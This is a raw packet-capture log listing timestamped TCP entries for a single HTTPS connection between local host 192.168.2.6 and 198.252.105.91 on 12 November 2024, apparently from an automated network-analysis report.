                                                                                                              Nov 12, 2024 15:55:02.654572010 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.654608965 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.655386925 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.655401945 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.655448914 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.655457973 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.655493021 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.657282114 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.657294989 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.657349110 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.657356977 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.657392025 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.769119978 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.769149065 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.769198895 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.769222975 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.769264936 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.769695997 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.769711018 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.769777060 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.769785881 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.769821882 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.770706892 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.770721912 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.770791054 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.770797968 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.770840883 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.773972988 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.773987055 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.774045944 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.774051905 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.774089098 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.774260044 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.774274111 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.774327993 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.774334908 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.774385929 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.775043011 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.775058031 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.775121927 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.775130033 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.775166035 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.775882006 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.775897980 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.775958061 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.775964975 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.776001930 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.884349108 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.884367943 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.884432077 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.884459972 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.884502888 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.884896994 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.884911060 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.884962082 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.884968996 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.885005951 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.885359049 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.885373116 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.885435104 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.885442972 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.885487080 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.885699034 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.885714054 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.885767937 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.885775089 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.885817051 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.885817051 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.886722088 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.886737108 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.886790991 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.886797905 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.886836052 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.886919975 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.886934042 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.886976957 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.886984110 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.887023926 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.887347937 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.887362957 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.887420893 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.887428045 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.887471914 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.887839079 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.887855053 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.887898922 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.887906075 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.887943029 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.888329029 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.888345957 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.888411045 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.888417959 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.888451099 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.888716936 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.888731956 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.888782024 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.888788939 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.888835907 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.889359951 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.889379978 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.889413118 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.889419079 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.889442921 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.889467001 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.890003920 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.890018940 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.890079021 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.890086889 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.890131950 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.890260935 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.890286922 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.890317917 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.890325069 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.890347958 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.890381098 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.890902996 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.890923023 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.890953064 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.890959024 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.890991926 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.891001940 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.000685930 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.000706911 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.000792027 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.000808001 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.000854015 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.000971079 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.000989914 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.001045942 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.001054049 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.001092911 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.001298904 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.001312971 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.001373053 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.001379967 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.001418114 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.001575947 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.001590967 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.001646042 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.001652956 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.001698017 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.001796007 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.001812935 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.001868010 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.001876116 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.001914978 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.002799988 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.002813101 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.002865076 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.002872944 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.002916098 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.003088951 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.003103971 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.003160000 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.003168106 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.003210068 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.003221035 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.003252983 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.003268957 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.003277063 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.003319025 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.003348112 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.006656885 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.006671906 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.006730080 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.006737947 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.006779909 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.007056952 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.007071018 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.007112026 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.007121086 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.007134914 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.007174015 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.007195950 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.007349968 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.007364988 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.007411957 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.007422924 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.007462025 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.007500887 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.007520914 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.007551908 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.007560015 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.007615089 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.007807016 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.007824898 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.007853031 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.007859945 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.007879019 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.007919073 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.007937908 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.007971048 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.007977962 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.007994890 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.008116007 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.008131027 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.008173943 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.008183002 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.008830070 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.008852005 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.008888960 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.008896112 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.008907080 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.008977890 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.008991957 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.009037018 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.009046078 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.009107113 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.009130001 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.009146929 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.009154081 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.009166002 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.009380102 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.009393930 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.009440899 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.009449959 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.009572983 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.009592056 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.009625912 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.009633064 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.009645939 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.009859085 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.009874105 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.009917974 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.009926081 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.055284023 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.115966082 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.115986109 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.116055012 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.116080046 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.116122961 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.116215944 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.116231918 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.116276979 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.116283894 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.116314888 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.116441965 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.116477966 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.116492987 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.116499901 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.116525888 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.116543055 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.116760969 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.116775990 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.116817951 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.116826057 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.116864920 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.117033958 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.117048979 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.117084980 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.117093086 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.117116928 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.117134094 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.117321014 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.117336988 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.117377043 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.117383957 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.117413044 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.117707014 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.117721081 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.117763996 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.117773056 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.117811918 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.118855000 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.118870020 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.118918896 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.118926048 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.118959904 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.119142056 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.119157076 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.119199991 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.119206905 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.119263887 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.120618105 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.120639086 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.120683908 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.120696068 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.120729923 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.120852947 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.120867014 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.120913029 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.120918989 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.120950937 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.121233940 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.121248960 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.121290922 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.121299028 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.121336937 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.121565104 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.121578932 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.121628046 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.121634960 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.121721983 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.121793032 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.121807098 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.121849060 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.121856928 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.121885061 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.122050047 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.122065067 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.122107983 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.122114897 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.122148991 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.122495890 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.122509956 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.122555017 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.122560024 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.122591019 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.122601032 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.122616053 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.122643948 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.122654915 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.122674942 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.122688055 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.123262882 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.123277903 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.123322010 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.123328924 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.123361111 CET49710443192.168.2.6198.252.105.91
